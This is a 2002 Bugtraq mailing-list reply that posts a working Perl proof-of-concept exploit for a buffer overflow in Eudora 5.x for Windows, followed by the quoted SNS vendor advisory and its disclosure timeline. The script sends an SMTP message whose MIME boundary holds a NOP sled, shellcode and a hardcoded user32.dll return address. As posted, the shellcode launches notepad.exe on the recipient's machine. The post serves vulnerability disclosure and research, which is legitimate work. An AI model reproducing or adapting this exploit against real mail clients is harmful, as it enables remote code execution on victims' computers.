[26558] in bugtraq
Re: [SNS Advisory No.55] Eudora 5.x for Windows Buffer Overflow Vulnerability
daemon@ATHENA.MIT.EDU (Kanatoko)
Tue Aug 6 15:36:02 2002
Message-ID: <20020806064133.29014.qmail@securityfocus.com>
Date: Tue, 06 Aug 2002 15:49:24 +0900
From: Kanatoko <anvil@jumperz.net>
To: bugtraq@securityfocus.com
In-Reply-To: <20020805152422.CF2E.SNSADV@lac.co.jp>
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
This is a proof of concept exploit for Eudora 5.x buffer overflow.
Tested on:
Japanese Windows 2000 Professional SP2
Eudora Version 5.0.2-Jr2
#!/usr/local/bin/perl
#---------------------------------------------------------------------
# Eudora Version 5.0.2-Jr2 exploit for Japanese Windows 2000 Pro (SP2)
# written by Kanatoko <anvil@jumperz.net>
# http://www.jumperz.net/
#---------------------------------------------------------------------
use Socket;
$connect_host = 'mail.jumperz.net';
$port = 25;
$env_from = 'anvil@jumperz.net';
$env_to = 'target@jumperz.net';
$from = 'anvil@jumperz.net';
$to = 'target@jumperz.net';
$iaddr = inet_aton($connect_host) || die "Host Resolve Error.\n";
$sock_addr = pack_sockaddr_in($port,$iaddr);
socket(SOCKET,PF_INET,SOCK_STREAM,0) || die "Socket Error.\n";
connect(SOCKET,$sock_addr) || die "Connect Error\n";
select(SOCKET); $|=1; select(STDOUT);
#egg written by UNYUN (http://www.shadowpenguin.org/)
#57bytes
$egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";
$buf = "\x90" x 121;
$buf .= $egg;
$buf .= "\xEB\xA0"; #JMP -0x60
$buf .= "A" x 2;
$buf .= "\x97\xAC\xE3\x77"; #0x77e3ac97 JMP EBX in user32.dll
$hoge = <SOCKET>;
print SOCKET "HELO hoge\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "MAIL FROM:<$env_from>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "RCPT TO:<$env_to>\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET "DATA\x0D\x0A";
$hoge = <SOCKET>;
print SOCKET << "_EOD_";
MIME-Version: 1.0\x0D
>From: $from\x0D
To: $to\x0D
Content-Type: multipart/mixed; boundary="$buf"\x0D
\x0D
.\x0D
_EOD_
$hoge = <SOCKET>;
print SOCKET "QUIT\x0D\x0A";
$hoge = <SOCKET>;
--
Kanatoko <anvil@jumperz.net>
JUMPER : http://www.jumperz.net/(Japanese)
On Mon, 05 Aug 2002 15:24:25 +0900
snsadv@lac.co.jp wrote:
> ----------------------------------------------------------------------
> SNS Advisory No.55
> Eudora 5.x for Windows Buffer Overflow Vulnerability
>
> Problem first discovered: 6 Jun 2002
> Published: 5 Aug 2002
> ----------------------------------------------------------------------
>
> Overview:
> ---------
> Eudora 5.x for Windows contains a buffer overflow vulnerability,
> which could allow a remote attacker to execute arbitrary code.
>
> Problem Description:
> --------------------
> Eudora developed and distributed by QUALCOMM Inc.
> (http://www.qualcomm.com/), is a Mail User Agent running on Windows
> 95/98/2000/ME/NT 4.0 and MacOS 8.1 or later.
>
> The buffer overflow occurs when Eudora receives a message using a long
> string as a boundary, which is used to divide a multi-part message into
> separate parts. In our verification environment, we have found that
> this could allow arbitrary commands to be executed.
>
> Tested Version:
> ---------------
> Eudora 5.0-J for Windows (Ver.5.0.2-Jr2 trial) [Japanese]
> Eudora 5.1.1 for Windows (Sponsored Mode) [English]
>
> Tested OS:
> ----------
> Microsoft Windows 2000 Professional SP2 [Japanese]
> Microsoft Windows 98 SE [Japanese]
>
> Solution:
> ---------
> The problem will be fixed in the next release of Eudora.
> The vendor has not reported when the next release will be available.
>
> Communication background:
> -------------------------
> 6 Jun 2002 : We discovered the vulnerability.
> 6 Jun 2002 : We reported the findings to Livin' on the EDGE Co., Ltd.
> (user support of Japanese version) .
> 14 Jun 2002 : the findings were reported again to Livin' on the EDGE Co.,
> Ltd. .
> 17 Jun 2002 : We contacted QUALCOMM Inc. .
> 18 Jun 2002 : QUALCOMM Inc. sent a reply stating that they had started an
> investigation of the problem.
> 3 Jul 2002 : We asked QUALCOMM Inc. about the progress of the
> investigation
> 19 Jul 2002 : We asked QUALCOMM Inc. again about the progress of the
> investigation
> 24 Jul 2002 : We informed QUALCOMM Inc. about the announcement schedule
> of this advisory
> 25 Jul 2002 : QUALCOMM Inc. reported that this problem will be fixed in
> the next release
> 5 Aug 2002 : We decided to disclose this vulnerability due to concern
> over the potential consequences this issue may cause.
> Livin' on the EDGE Co., Ltd. has not provided any comments
> on this issue as of August 5, 2002.
>
> Discovered by:
> --------------
> Nobuo Miwa (LAC / n-miwa@lac.co.jp)
>
> Disclaimer:
> -----------
> All information in these advisories are subject to change without any
> advanced notices neither mutual consensus, and each of them is released
> as it is. LAC Co.,Ltd. is not responsible for any risks of occurrences
> caused by applying those information.
>
> ------------------------------------------------------------------
> SecureNet Service(SNS) Security Advisory <snsadv@lac.co.jp>
> Computer Security Laboratory, LAC http://www.lac.co.jp/security/
>
>
